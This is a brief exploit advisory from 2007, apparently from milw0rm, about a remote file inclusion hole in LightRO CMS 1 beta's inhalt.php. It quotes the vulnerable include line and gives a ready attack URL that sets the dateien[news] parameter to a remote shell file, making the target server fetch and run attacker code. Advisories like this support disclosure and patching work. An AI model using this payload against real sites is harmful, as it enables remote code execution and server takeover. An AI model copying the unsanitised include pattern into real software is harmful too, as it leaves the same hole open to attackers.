39 lines
No EOL
648 B
Text
39 lines
No EOL
648 B
Text
*******************************************************************************
|
|
# Title : LightRO CMS 1 beta(inhalt.php) Remote File Include Vulnerability
|
|
# Author : ajann
|
|
# Contact : :(
|
|
# S.Page : http://www.lightro.de.tc/
|
|
# $$ : Free
|
|
|
|
*******************************************************************************
|
|
[[ERROR]]]
|
|
..
|
|
...
|
|
.....
|
|
<?
|
|
include $dateien['news'];
|
|
?>
|
|
..
|
|
...
|
|
.....
|
|
|
|
[[ERROR]]]
|
|
|
|
|
|
[[RFI]]]
|
|
|
|
http://[target]/[path]/inhalt.php?dateien[news]=[SHELL]
|
|
|
|
Example:
|
|
|
|
//inhalt.php?dateien[news]=http://[target]/[path]/shell.x
|
|
|
|
[[/RFI]]
|
|
|
|
"""""""""""""""""""""
|
|
# ajann,Turkey
|
|
# ...
|
|
|
|
# Im not Hacker!
|
|
|
|
# milw0rm.com [2007-02-06] |